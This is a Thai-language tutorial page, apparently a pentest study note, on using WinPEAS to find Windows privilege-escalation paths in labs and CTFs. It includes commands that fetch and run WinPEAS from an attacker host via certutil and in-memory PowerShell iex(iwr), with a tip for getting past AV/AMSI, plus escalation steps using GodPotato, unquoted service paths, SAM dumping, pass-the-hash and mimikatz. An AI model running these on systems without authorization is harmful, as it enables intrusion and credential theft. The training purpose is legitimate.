WinPEAS Playbook
Playbook สำหรับ WinPEAS — script enumeration อัตโนมัติของ Windows privesc แบ่งตามระดับ พร้อม workflow การอ่านผล, decision tree (เจอ vector ไหนทำอะไรต่อ), cheatsheet และตัวอย่าง (เนื้อหาเพื่อฝึกใน lab/CTF/ระบบที่ได้รับอนุญาต)
1. Beginner — รัน WinPEAS
WinPEAS สแกน Windows ทุกด้านอัตโนมัติแล้ว highlight ช่องทาง privesc ด้วยสี มีทั้ง exe/bat/ps1 — เลือกตามที่รันได้บนเป้าหมาย
# download (จากเครื่องเรา python3 -m http.server 80)
certutil -urlcache -f http://<ATTACKER>/winPEASx64.exe wp.exe
powershell -c "iwr http://<ATTACKER>/winPEASx64.exe -OutFile wp.exe"
# รัน
.\wp.exe
.\wp.exe log # บันทึกผล
# in-memory ผ่าน PowerShell (ไม่แตะ disk)
iex (iwr http://<ATTACKER>/winPEAS.ps1 -UseBasicParsing)2. Intermediate — อ่านผลตามสี
| สี | ความหมาย |
|---|---|
| แดงพื้นเหลือง | น่าสนใจสูงสุด — ดูก่อน! |
| แดง | ควรตรวจ |
| เขียว | ปกติ/พบทั่วไป |
3. Advanced — ส่วนผลที่ต้องเจาะ
- Token privileges: SeImpersonate → Potato; SeBackup/SeDebug → dump/inject
- Services: unquoted path, weak permission (แก้ binPath), modifiable binary
- Registry: AlwaysInstallElevated, autorun ที่เขียนได้, weak reg perm
- Scheduled Tasks: task รันเป็น SYSTEM ที่เราแก้ binary ได้
- Credentials: stored creds, Credential Manager, unattend.xml, registry password
- Applied/missing patches: สำหรับ kernel/MS exploit
4. Decision Tree — เจอ vector แล้วทำอะไร
5. Workflow แนะนำ
- 1ส่ง WinPEAS เข้าเป้าหมาย (certutil/iwr) แล้วรัน
- 2เริ่มที่ whoami /priv ควบคู่ (SeImpersonate = Potato ทันที)
- 3ไล่ส่วนแดงพื้นเหลือง: service / registry / task
- 4เจอ service misconfig → accesschk ยืนยัน → abuse
- 5credential ที่เจอ → ลอง reuse / pass-the-hash
- 6ทางเลือกท้าย: missing patch → kernel/MS exploit
6. Cheatsheet
- ส่ง:
certutil -urlcache -f http://IP/wp.exe wp.exe - รัน:
.\wp.exe/ in-memoryiex(iwr ...ps1) - อ่านสี: แดงพื้นเหลือง = น่าสนใจสุด
- token: SeImpersonate → Potato; SeBackup → dump SAM
- service: unquoted / weak perm → SYSTEM
- registry: AlwaysInstallElevated → MSI → SYSTEM
7. ตัวอย่างโจทย์
service account: WinPEAS ส่วน Token privileges ขึ้น SeImpersonatePrivilege: Enabled (พื้นแดง) → ดาวน์โหลด GodPotato → GodPotato-NET4.exe -cmd "cmd /c whoami" → nt authority\system
unquoted path: WinPEAS ส่วน Services ขึ้น path มีช่องว่างไม่มี quote + folder เขียนได้ → วาง exe ชื่อตรงคำแรก → restart service → payload รันเป็น SYSTEM
🧭 จับมือทำทีละขั้น (มีแค่ Kali) + ถ้าติดไปไหนต่อ
สมมติได้ shell/RDP ระดับ user ธรรมดาบนเครื่อง Windows เป้าหมายแล้ว มีแค่ Kali เป็นเครื่องโจมตี ทำตามนี้ทีละขั้นเพื่อไต่สิทธิ์เป็น SYSTEM
- 1บน Kali เตรียมไฟล์: เช็คมีไหม `locate winPEAS` หรือโหลดจาก GitHub `git clone https://github.com/peass-ng/PEASS-ng`
- 2เปิด web server ฝั่ง Kali: `python3 -m http.server 80` ที่โฟลเดอร์มี winPEASx64.exe
- 3บนเครื่อง target ดาวน์โหลดผ่าน certutil (built-in ทุกเครื่อง Windows): `certutil -urlcache -f http://
/winPEASx64.exe wp.exe` - 4ถ้า certutil ถูกบล็อก (AV/AMSI) ลอง PowerShell in-memory แทน: `iex (iwr http://
/winPEAS.ps1 -UseBasicParsing)` - 5รันไฟล์: `.\wp.exe` หรือถ้าต้องเก็บผล `.\wp.exe log`
- 6ระหว่างรอ ให้เช็คคู่ขนานด้วยมือ: `whoami /priv` — ถ้าเห็น SeImpersonatePrivilege = Enabled คือช่องทางลัด (Potato)
- 7อ่านผล WinPEAS — ไล่ดูส่วน 'พื้นหลังแดงเหลือง' ก่อน (น่าสนใจสุด)
- 8เจอ SeImpersonate → โหลด GodPotato มาใช้ทันที (ดูขั้นตอนในหัวข้อ Token Abuse)
- 9เจอ service เขียนได้/unquoted path → เทียบกับ accesschk แล้ว abuse
- 10ไม่เจออะไรชัด → ดู registry (AlwaysInstallElevated), scheduled tasks, credential ที่เก็บไว้
- 11ยังตัน → ตรวจ patch level เทียบ known CVE (Watson/Sherlock) เป็นทางเลือกสุดท้าย
| ขั้นตอน/งาน | เครื่องมือใน Kali | ติดตั้งเพิ่ม (ถ้าไม่มี) | เครื่องมือออนไลน์ |
|---|---|---|---|
| เตรียม winPEAS | locate winPEAS (Kali) | git clone PEASS-ng | lolbas-project.github.io |
| ส่งไฟล์เข้า target | python3 -m http.server | - | - |
| ดาวน์โหลดบน target (built-in) | certutil, powershell iwr | - | - |
| เช็ค privilege ปัจจุบัน | whoami /priv | - | - |
| ยึด SYSTEM จาก SeImpersonate | - | GodPotato/PrintSpoofer (github) | - |
| ตรวจ service permission | accesschk.exe (Sysinternals) | - | - |
| ตรวจ missing patch/CVE | - | Watson, Sherlock | cve.mitre.org |
| dump credential | mimikatz | - | - |
หัวข้อที่เชื่อมโยง
โน้ตของฉัน
ยังไม่มีโน้ตสำหรับหัวข้อนี้